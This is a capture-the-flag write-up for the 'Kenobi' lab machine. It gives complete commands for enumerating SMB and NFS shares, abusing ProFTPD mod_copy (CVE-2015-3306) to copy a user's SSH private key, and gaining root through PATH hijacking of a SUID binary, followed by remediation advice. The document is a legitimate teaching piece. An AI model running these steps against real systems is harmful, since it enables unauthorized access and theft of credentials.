Target IP: 10.10.217.222 (Kenobi) Difficulty: Easy Objective: User (user.txt) & Root (root.txt) Flags

1. Executive Summary

“Kenobi” is a Linux machine that demonstrates how chaining multiple service misconfigurations can lead to a full system compromise. Initial access is achieved by identifying a writable SMB share and a vulnerable ProFTPD service. By leveraging the mod_copy vulnerability in ProFTPD, we copy a private SSH key from the filesystem to the accessible NFS share, allowing for SSH login. Privilege escalation is achieved by exploiting a custom SUID binary (/usr/bin/menu) that executes system commands without absolute paths, allowing for PATH Manipulation.

Key TTPs (MITRE ATT&CK):

  • T1595 (Active Scanning): Nmap port and script scanning.
  • T1021.002 (SMB/Windows Admin Shares): Enumerating anonymous SMB shares.
  • T1210 (Exploitation of Remote Services): Exploiting ProFTPD mod_copy (CVE-2015-3306).
  • T1574 (Hijack Execution Flow): Path Interception via SUID binary.

2. Information Gathering

A. Network Scanning

We begin with an Nmap scan to identify open ports and services.

nmap -sC -sV -oN nmap/kenobi 10.10.217.222

Key Findings:

  • 21/tcp (FTP): ProFTPD 1.3.5.
  • 139/445 (SMB): Samba running on Ubuntu.
  • 111/2049 (NFS): Network File System.
  • 80/tcp (HTTP): Apache 2.4.18.

B. SMB Enumeration (Samba)

We enumerate the SMB shares to find accessible directories.

nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.217.222

Results:

  • \\10.10.217.222\anonymous: READ/WRITE access allowed.

We connect to the share and inspect its contents:

smbclient //10.10.217.222/anonymous
# Password: (Empty)
ls
get log.txt
  • Intel: The log.txt file reveals information about an SSH key generation for the user kenobi and the location of the ProFTPD configuration.

C. NFS Enumeration

Port 111 (RPC) indicates NFS shares might be available.

nmap -p 111 --script=nfs-ls,nfs-showmount 10.10.217.222

Results:

  • /var is a mountable share.

3. Initial Access: The ProFTPD Exploit

A. Vulnerability Analysis

The scan identified ProFTPD 1.3.5. A search in exploit databases reveals the mod_copy vulnerability (CVE-2015-3306).

The Vulnerability: The mod_copy module allows unauthenticated clients to use SITE CPFR (Copy From) and SITE CPTO (Copy To) commands to copy files anywhere on the filesystem (permissions permitting).

B. Exploitation Chain

We need to get the SSH private key (/home/kenobi/.ssh/id_rsa) to a location we can access. Since we can mount /var via NFS, we will copy the key there.

  1. Connect to FTP:
nc 10.10.217.222 21
  1. Execute Copy Commands:
SITE CPFR /home/kenobi/.ssh/id_rsa
SITE CPTO /var/tmp/id_rsa

(Result: “250 Copy successful”) 3. Mount NFS Share:

mkdir /mnt/kenobiNFS
sudo mount 10.10.217.222:/var /mnt/kenobiNFS
ls -la /mnt/kenobiNFS/tmp

We see id_rsa in the directory. 4. Retrieve Key & Login:

cp /mnt/kenobiNFS/tmp/id_rsa .
chmod 600 id_rsa
ssh -i id_rsa kenobi@10.10.217.222

Status: Access gained as user kenobi. User Flag: /home/kenobi/user.txt


4. Privilege Escalation: Path Hijacking

A. SUID Enumeration

We search for files with the SUID bit set, which execute with the file owner’s privileges (often root).

find / -perm -u=s -type f 2>/dev/null

Finding: /usr/bin/menu looks non-standard.

B. Binary Analysis

Running the binary presents a menu to check status, kernel version, or run ifconfig. We run strings on the binary to see how it calls these commands.

strings /usr/bin/menu

Output:

curl -I localhost
uname -r
ifconfig

Critical Flaw: The binary calls curl, uname, and ifconfig without absolute paths (e.g., /usr/bin/curl). This means it relies on the system $PATH variable to find them.

C. Exploitation

We can “hijack” the path by creating a malicious script named curl, placing it in a folder (like /tmp), and adding that folder to the start of the $PATH.

  1. Create Payload:
cd /tmp
echo /bin/sh > curl
chmod 777 curl
  1. Manipulate PATH:
export PATH=/tmp:$PATH
  1. Execute Vulnerable Binary:
/usr/bin/menu
# Select option 1 (which calls 'curl')

Result: The binary runs our fake curl (which is actually /bin/sh) with SUID root privileges.

# whoami
root
cat /root/root.txt

5. Remediation (Blue Team)

  1. ProFTPD: Upgrade ProFTPD to a version that patches the mod_copy vulnerability or disable the module in the configuration if not needed.
  2. Samba/NFS:
  • Restrict NFS exports (/var) to specific trusted IPs rather than *.
  • Ensure sensitive data (SSH keys) cannot be easily copied to public shares.
  1. SUID Binaries:
  • Use absolute paths (e.g., /usr/bin/curl) in scripts and binaries compiled for administrative tasks.
  • sanitize environment variables within SUID binaries to prevent PATH manipulation.